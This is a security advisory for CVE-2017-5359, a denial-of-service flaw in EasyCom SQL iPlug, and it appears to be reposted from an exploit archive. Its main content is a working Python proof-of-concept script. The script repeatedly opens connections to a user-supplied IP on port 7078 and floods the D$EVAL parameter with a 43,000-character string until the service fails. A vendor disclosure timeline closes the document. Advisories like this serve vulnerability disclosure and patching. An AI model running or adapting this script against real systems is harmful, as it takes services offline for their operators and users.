EasyCom SQL iPlug Denial Of Service Exploit

[+] Credits: John Page AKA Hyp3rlinX  
[+] Website: hyp3rlinx.altervista.org

Vendor:
================
easycom-aura.com



Product:
===========
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe

SQL iPlug provides System i applications real-time access to heterogeneous and external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.



Vulnerability Type:
===================
Denial Of Service



CVE Reference:
==============
CVE-2017-5359



Security Issue:
================
SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
HTTP requests fed to the "D$EVAL" parameter.



Exploit/POC:
============

import socket

print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'

IP = raw_input("[IP]> ")
PORT = 7078 
payload="A"*43000
 
arr=[]
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c+=1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break




Disclosure Timeline:
======================================
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure

#  0day.today [2018-01-10]  #